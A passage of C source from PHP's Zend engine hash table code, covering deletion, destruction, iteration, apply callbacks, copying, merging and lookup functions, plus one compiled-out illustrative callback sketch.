ZEND_API int ZEND_FASTCALL zend_hash_del_ind(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, data);
ZVAL_UNDEF(data);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(data);
}
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del_ind(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_UNDEF(data);
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_index_del(HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
_zend_hash_del_el_ex(ht, HT_IDX_TO_HASH(h), p, NULL);
return SUCCESS;
}
}
return FAILURE;
}
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h) && (p->key == NULL)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API void ZEND_FASTCALL zend_hash_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
SET_INCONSISTENT(HT_DESTROYED);
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
zend_hash_iterators_remove(ht);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
return;
}
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
ZEND_API void ZEND_FASTCALL zend_array_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
/* break possible cycles */
GC_REMOVE_FROM_BUFFER(ht);
GC_TYPE_INFO(ht) = IS_NULL | (GC_WHITE << 16);
if (ht->nNumUsed) {
/* In some rare cases destructors of regular arrays may be changed */
if (UNEXPECTED(ht->pDestructor != ZVAL_PTR_DTOR)) {
zend_hash_destroy(ht);
goto free_ht;
}
p = ht->arData;
end = p + ht->nNumUsed;
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
zend_hash_iterators_remove(ht);
SET_INCONSISTENT(HT_DESTROYED);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
goto free_ht;
}
efree(HT_GET_DATA_ADDR(ht));
free_ht:
FREE_HASHTABLE(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
}
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
HT_HASH_RESET(ht);
}
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_symtable_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->u.flags & HASH_FLAG_STATIC_KEYS) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
HT_HASH_RESET(ht);
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
p = ht->arData;
for (idx = 0; idx < ht->nNumUsed; idx++, p++) {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_reverse_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
p = ht->arData + ht->nNumUsed;
while (idx > 0) {
idx--;
p--;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
/* This is used to iterate over the elements of a hashtable and selectively
 * delete certain entries. apply_func() receives the data and decides if the
 * entry should be deleted or if iteration should be stopped. The following
 * three return codes are possible:
 * ZEND_HASH_APPLY_KEEP - continue
 * ZEND_HASH_APPLY_STOP - stop iteration
 * ZEND_HASH_APPLY_REMOVE - delete the element, combinable with the former
 */
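/* Illustrative sketch (not part of the original source): a minimal
 * apply_func_t callback showing how the return codes above are meant to be
 * used. The callback name is hypothetical and the block is compiled out on
 * purpose, so it does not change the build.
 */
#if 0
static int example_remove_null_entries(zval *zv)
{
	if (Z_TYPE_P(zv) == IS_NULL) {
		/* delete this element and keep iterating */
		return ZEND_HASH_APPLY_REMOVE;
	}
	/* keep the element; returning ZEND_HASH_APPLY_REMOVE | ZEND_HASH_APPLY_STOP
	 * would delete it and then stop the iteration */
	return ZEND_HASH_APPLY_KEEP;
}
/* usage: zend_hash_apply(ht, example_remove_null_entries); */
#endif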
ZEND_API void ZEND_FASTCALL zend_hash_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_argument(HashTable *ht, apply_func_arg_t apply_func, void *argument)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val, argument);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...)
{
uint32_t idx;
Bucket *p;
va_list args;
zend_hash_key hash_key;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
va_start(args, num_args);
hash_key.h = p->h;
hash_key.key = p->key;
result = apply_func(&p->val, num_args, args, &hash_key);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
va_end(args);
break;
}
va_end(args);
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_reverse_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_copy(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor)
{
uint32_t idx;
Bucket *p;
zval *new_entry, *data;
zend_bool setTargetPointer;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
setTargetPointer = (target->nInternalPointer == HT_INVALID_IDX);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (setTargetPointer && source->nInternalPointer == idx) {
target->nInternalPointer = HT_INVALID_IDX;
}
/* INDIRECT element may point to UNDEF-ined slots */
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
continue;
}
}
if (p->key) {
new_entry = zend_hash_update(target, p->key, data);
} else {
new_entry = zend_hash_index_update(target, p->h, data);
}
if (pCopyConstructor) {
pCopyConstructor(new_entry);
}
}
if (target->nInternalPointer == HT_INVALID_IDX && target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_always_inline int zend_array_dup_element(HashTable *source, HashTable *target, uint32_t idx, Bucket *p, Bucket *q, int packed, int static_keys, int with_holes)
{
zval *data = &p->val;
if (with_holes) {
if (!packed && Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
} else if (!packed) {
/* INDIRECT element may point to UNDEF-ined slots */
if (Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
}
}
do {
if (Z_OPT_REFCOUNTED_P(data)) {
if (Z_ISREF_P(data) && Z_REFCOUNT_P(data) == 1 &&
(Z_TYPE_P(Z_REFVAL_P(data)) != IS_ARRAY ||
Z_ARRVAL_P(Z_REFVAL_P(data)) != source)) {
data = Z_REFVAL_P(data);
if (!Z_OPT_REFCOUNTED_P(data)) {
break;
}
}
Z_ADDREF_P(data);
}
} while (0);
ZVAL_COPY_VALUE(&q->val, data);
q->h = p->h;
if (packed) {
q->key = NULL;
} else {
uint32_t nIndex;
q->key = p->key;
if (!static_keys && q->key) {
zend_string_addref(q->key);
}
nIndex = q->h | target->nTableMask;
Z_NEXT(q->val) = HT_HASH(target, nIndex);
HT_HASH(target, nIndex) = HT_IDX_TO_HASH(idx);
}
return 1;
}
static zend_always_inline void zend_array_dup_packed_elements(HashTable *source, HashTable *target, int with_holes)
{
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, 0, p, q, 1, 1, with_holes)) {
if (with_holes) {
ZVAL_UNDEF(&q->val);
}
}
p++; q++;
} while (p != end);
}
static zend_always_inline uint32_t zend_array_dup_elements(HashTable *source, HashTable *target, int static_keys, int with_holes)
{
uint32_t idx = 0;
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, idx, p, q, 0, static_keys, with_holes)) {
uint32_t target_idx = idx;
idx++; p++;
while (p != end) {
if (zend_array_dup_element(source, target, target_idx, p, q, 0, static_keys, with_holes)) {
if (source->nInternalPointer == idx) {
target->nInternalPointer = target_idx;
}
target_idx++; q++;
}
idx++; p++;
}
return target_idx;
}
idx++; p++; q++;
} while (p != end);
return idx;
}
ZEND_API HashTable* ZEND_FASTCALL zend_array_dup(HashTable *source)
{
uint32_t idx;
HashTable *target;
IS_CONSISTENT(source);
ALLOC_HASHTABLE(target);
GC_REFCOUNT(target) = 1;
GC_TYPE_INFO(target) = IS_ARRAY;
target->nTableSize = source->nTableSize;
target->pDestructor = source->pDestructor;
if (source->nNumUsed == 0) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_INITIALIZED|HASH_FLAG_PACKED|HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
target->nTableMask = HT_MIN_MASK;
target->nNumUsed = 0;
target->nNumOfElements = 0;
target->nNextFreeElement = 0;
target->nInternalPointer = HT_INVALID_IDX;
HT_SET_DATA_ADDR(target, &uninitialized_bucket);
} else if (GC_FLAGS(source) & IS_ARRAY_IMMUTABLE) {
target->u.flags = (source->u.flags & ~HASH_FLAG_PERSISTENT) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
memcpy(HT_GET_DATA_ADDR(target), HT_GET_DATA_ADDR(source), HT_USED_SIZE(source));
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else if (source->u.flags & HASH_FLAG_PACKED) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
HT_HASH_RESET_PACKED(target);
if (target->nNumUsed == target->nNumOfElements) {
zend_array_dup_packed_elements(source, target, 0);
} else {
zend_array_dup_packed_elements(source, target, 1);
}
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNextFreeElement = source->nNextFreeElement;
target->nInternalPointer = source->nInternalPointer;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
HT_HASH_RESET(target);
if (target->u.flags & HASH_FLAG_STATIC_KEYS) {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 1, 0);
} else {
idx = zend_array_dup_elements(source, target, 1, 1);
}
} else {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 0, 0);
} else {
idx = zend_array_dup_elements(source, target, 0, 1);
}
}
target->nNumUsed = idx;
target->nNumOfElements = idx;
if (idx > 0 && target->nInternalPointer == HT_INVALID_IDX) {
target->nInternalPointer = 0;
}
}
return target;
}
ZEND_API void ZEND_FASTCALL _zend_hash_merge(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, zend_bool overwrite ZEND_FILE_LINE_DC)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
if (overwrite) {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_update(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
} else {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_ADD | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_add(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_bool ZEND_FASTCALL zend_hash_replace_checker_wrapper(HashTable *target, zval *source_data, Bucket *p, void *pParam, merge_checker_func_t merge_checker_func)
{
zend_hash_key hash_key;
hash_key.h = p->h;
hash_key.key = p->key;
return merge_checker_func(target, source_data, &hash_key, pParam);
}
ZEND_API void ZEND_FASTCALL zend_hash_merge_ex(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, merge_checker_func_t pMergeSource, void *pParam)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (zend_hash_replace_checker_wrapper(target, &p->val, p, pParam, pMergeSource)) {
t = zend_hash_update(target, p->key, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
/* Returns the hash table data if found and NULL if not. */
ZEND_API zval* ZEND_FASTCALL zend_hash_find(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? &p->val : NULL;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_find(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_exists(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? 1 : 0;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_str_exists(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? 1 : 0;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_find(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
return &p->val;
}
}
return NULL;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_index_exists(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
if (Z_TYPE(ht->arData[h].val) != IS_UNDEF) {
return 1;
}
}
return 0;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? 1 : 0;
}
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_reset_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
for (idx = 0; idx < ht->nNumUsed; idx++) {
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
/* This function could be greatly optimized by remembering
 * the end of the list
 */
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_end_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
ZEND_API int ZEND_FASTCALL zend_hash_move_forward_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (1) {
idx++;
if (idx >= ht->nNumUsed) {
*pos = HT_INVALID_IDX;
return SUCCESS;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
} else {
return FAILURE;
}
}
ZEND_API int ZEND_FASTCALL zend_hash_move_backwards_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
*pos = HT_INVALID_IDX;
return SUCCESS;
} else {
return FAILURE;
}
}
/* This function should be made binary safe */
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_ex(const HashTable *ht, zend_string **str_index, zend_ulong *num_index, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
*str_index = p->key;
return HASH_KEY_IS_STRING;
} else {
*num_index = p->h;
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API void ZEND_FASTCALL zend_hash_get_current_key_zval_ex(const HashTable *ht, zval *key, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx == HT_INVALID_IDX) {
ZVAL_NULL(key);
} else {
p = ht->arData + idx;
if (p->key) {
ZVAL_STR_COPY(key, p->key);
} else {
ZVAL_LONG(key, p->h);
}
}
}
